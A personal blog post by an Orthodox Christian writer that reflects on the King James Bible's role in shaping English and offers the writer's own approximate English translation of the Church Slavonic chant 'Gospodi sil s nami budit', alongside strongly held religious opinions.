While talking about impact of Christian faith to English, it is no strange Africa (continent countries) and the rest of the undeveloped or so called third world countries are in such a bad condition, because many of them had never had the chance of true spiritual enlightenment through faith in the Lord Jesus Christ. It is probably one of the reasons why western civilization was blessed to have a material goods advancement as a mean that those people help the poor and needy and spread the light of faith. Unfortunately now westerners can no longer spread the light of the faith because English Church is Anglican and is no longer in communion with the One Holy Apostolic Church – The Holy Orthodox Church. It is useful to say Anglican Church in its development as a separate Church did take some of its beliefs of Roman Catholics and some of beliefs from Protestant Reformation. I even red somewhere, the Anglican Church had a point in his history where some negotiations were made with (Greek Eastern Orthodox Church?) that Anglicans unite with the Eastern Orthodox Church. Pitily this never happened. But who knows maybe in future Anglicans will change back to the original Christian faith Orthodox Christianity.
Though King James Bible version, played important role in development of Englishman and English as we know it, some of the verses inside are translated so they correspond better to a protestant understanding of the Holy Bible than Orthodox or Roman Catholic. Besides that the bible contains less books (66 Books), whether the Orthodox Christian bible contains (77 Books).
Though missing some important books still the Bible included many new words and by letting the multitudes across Great Britain, Scotland, England and later new populated American lands it become the most rich words book for XVI th century. Thought some words in KJV are too much archaic for nowdays, the language of it is pretty close to modern English and 95% and more understandable by mostly anyone who speaks some kind of English. Because of its historical importance of forming the English Language. King James Holy Bible version is a great reading for anyone willing to learn some English. I myself has significantly improved my English by reading KJV. Actually I believe for anyone interested in history and anthropology it is very important to study well Christianity. Christianity and faith in Christ played so huge role in our civilization development, that it is impossible for us to understand properly History and Civilization without knowing well Christian faith. I took some time to read interesting facts related to King James Holy Bible so I found an interesting page prepared by some Christian enthusiasts which did a statistical analysis over King James Bible Content 🙂
The whole topic of Origin of Words is mostly the most important thing that should be taught at schools and universities today, as it helps us better to understand why our culture and civilization is the way we are. As long as I studied in Holland in Arnhem Business School, it is quite saddening to say nowadays Universities and modern science has so much forgot about its relation and origins to faith in God, that even the little sort of anthropology I was told in Arnhem Business School – Human Resources and Quality Management (now known under the new official name IBS – International Business Studies) has absolutely nothing to do with real facts – the Christianity part (which is essential is totally missing).
With all said, Modern people want to have a partial truth and completely scratch out our modern civilization Christian origins. The Crisis which emerged is just a reflection of the great spiritual Chrisis and lack of faith in God that is more and more apparent this days.
I've been lately more and more interested in Anthrophology and whether I learn a bit more I will share it here and hopefully it might be interesting to someone else too 🙂
I don’t know if above Gospodi Sil s Nami Budit song which is in Church Slavonic – ( Ancient Bulgarian Language) has translation somewhere on the Internet but as far as I checked I couldn’t find any translation and hence I took some time trying to approximately translate, above included text I found on the Internet.
It is a bit hard for me and maybe I’m mistaken somewhere in the translation as I’m not understanding very well Church Slavonic but I hope the song will give a general idea, what this so beatiful song lyrics are approximately saying in modern English.
Text song the Gods Power will be with us, You we have as helper in our sorrows, Let God’s Power have mercy on us. Praise him and and His Power, Praise Him becaues of his Great Mercies. – performed by Moscow’s Sretenski Monastery Church Choire
Gods Power will be with us … helper in our sorrows we have. God’s power will be with us Oh Power / (force) of God, have mercy on us!
Praise (Glorify) the Lord in his holiness, praise him testifying his power. God’s Power / (force) will be with us!
Glorify Him because of his power, Praise him because of his multitude of greatness-es. Gods Power will be with us!
Praise (Glorify) Him with voice of trumpets, Praise him with Psalms and (pipes ?). Gods Power will be with us!
Praise Him in (timpans and lices – not sure how this is translated – means other musical instruments?) – Praise him in strings and organs. Gods Power will be with us!
Praise Him with cymbals and (good hearted?) voices, praise him, praise Him with exclamations: every living soul (exhalation) to glorify the Lord. Gods Power will be with us:
Praise the Lord in all holiness, Praise Him in statement of his power. Gods Power will be with us:
Glory: Oh Lord, If we do not have (byhom?) Your holy prayer books, and the goodness of thy prayer books and the goodness of all saints who pray for us; what would we do oh Saviour, we who sing you.
You are glorified all time by Angels
You who glorify all the time Angels. Seer of all hearts, have mercy on our souls.
And again: Many are my prayers oh Holy Theotokos / (Virgin Mary), I have come to you the most pure, asking (requiring) rescue.
Come to my infirm (weak) soul, and pray Your Son and and Our Lord, to grant me Forgiveness of sins, Because I’m poor and week (in evil), You who are most Blessed among Mankind.
Oh you most Holy Theotokos, in my lifetime don’t leave me on a human mercy (hope) but you alone intercede on my behalf and Have Mercy on Me!
All my hopÐµ I give to you, Oh Mother of God, Rescue (ÐšÐµÐµp) me under your Shelter / (Shroud).
God’s Power Will be With Us is a triumph song of Victory of the Holy Orthodox Christian faith and the Orthodox Christians over all evil that is in the post sin fallen world. It is a Victorious Chant stating God’s power is with all us Orthodox Christians.
It is an expression of the power that our Holy Orthodox Christian faith contains. Gods power will be with us is a well known for all Eastern Orthodox Slavonic Christians. It is being sing in most if not all Slavonic Eastern Orthodox Churches around the world i.e. – Bulgaria, Russia, Serbia
It is common that this very beautiful Ancient Church Slavonic song is being nowdays sung, by Orthodox Christian choires even in the Western World which so sadly is nowdays predominated by Roman Catholic and Protestant (denominations beliefs). Here is God’s power will be with us – as sung in Church Slavonicin a Roman Catholic Chapel
Orthodox Christian Chant – Gospodi sil s nami (Russe Znamenny) / Gospodi sil s nami budit
Pojanje Koviljskih Monaha-Psalam 150 (Part of Gospodi sil s nami budit – Repetancance Great Lent Canon sing in Serbian Monasteries)
This Church chanting song is sing in the Great Lent Church period around all Slavonic Churches around the world. The spiritual deepness the song contains and spiritual joy is amazingly great for us Eastern Orthodox Christians; it is barely impossible to explain in words, but I hope by listening it the listener re-unites with our Christ = (Messiah) = Saviour and his Holy Apostolic Church – The Orthodox Church!
This Orthodox Song is also present, probably in Greek, Syriac, Jerusalem, Ethiopian,Coptic, Chinese and the rest of local Orthodox Church-es throughout the whole universe. If someone from other Orthodox Churches reading this post, can point me out to their Church variant of these glorious Church hymn I will be mostly thankful!
Glory be to the Father, The Son and The Holy Spirit now and Forever and Ever. For Gods Power – Christ’s Holy Spirit will be with us ever unto the Ages of Ages accordinly to the promise of our Lord Jesus in Holy Gospels.
☩ Walking in Light with Christ – Faith, Computing, Diary 2006-2020 Powered by: Pc Freak Solutions and Comments (RSS). Verbatim copying and distribution of this entire article is permitted in any medium, provided this notice is preserved.